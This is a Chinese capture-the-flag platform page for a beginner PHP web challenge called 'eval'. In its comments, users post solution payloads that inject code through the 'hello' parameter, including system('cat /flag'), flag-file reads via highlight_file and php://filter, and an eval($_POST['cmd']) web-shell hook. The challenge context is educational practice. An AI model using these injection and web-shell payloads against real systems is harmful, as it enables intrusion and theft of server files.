evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18598
提  示:
描  述:
eval
评论
chm 20天前

http://171.80.2.169:19841/?hello=file(%22flag.php%22)

回复 1

yiya咿呀 1月前

url/?hello=eval(system('cat /flag'))

回复 0

道法自然 1月前

蚁剑直接 url/?hello=eval($_POST['cmd')

回复 0

1nfinix 1月前

构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//

回复 0

lins11 2月前

/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码

回复 0

叱咤月海鱼鱼猫 3月前

?hello=highlight_file('flag.php')

回复 1

banfang 3月前

点击场景后将代码发送给豆包等一分钟基本上就可以了

回复 0

pks0 3月前

?hello=1);highlight_file(%27flag.php%27);//

回复 1

一个姓⎝李⎠的师傅~ 5月前

知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d

回复 10
pipipikaqiu 2月前

写的好详细,太好了啊

回复 1

一个姓⎝李⎠的师傅~ 2月前

@想好思路再支付 有帮助就好,感谢老铁的认可!!!

回复 1

想好思路再支付 2月前

思路讲的真好啊李师傅

回复 1

ubudj 5月前

?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名

回复 1

WriteUp

image
harry

1 金币

评分(10)

解题动态

uiu 攻破了该题 6小时前
Rencj 攻破了该题 9小时前
无情的白给机器人 攻破了该题 10小时前
大奇 攻破了该题 11小时前
神逆流·神里绫华 攻破了该题 14小时前
小鱼板板 攻破了该题 14小时前
kiritoldws 攻破了该题 15小时前
chenzhong 攻破了该题 1天前
gusto. 攻破了该题 1天前
z2l1 攻破了该题 1天前
多斯Nico 攻破了该题 1天前
13522765614 攻破了该题 1天前
等往事风中吹‘ 攻破了该题 2天前
evilk 攻破了该题 2天前
kim66 攻破了该题 2天前
flag大王 攻破了该题 2天前
66744565 攻破了该题 2天前
3373441596 攻破了该题 2天前
pengyu 攻破了该题 2天前
muerjing 攻破了该题 3天前
问题反馈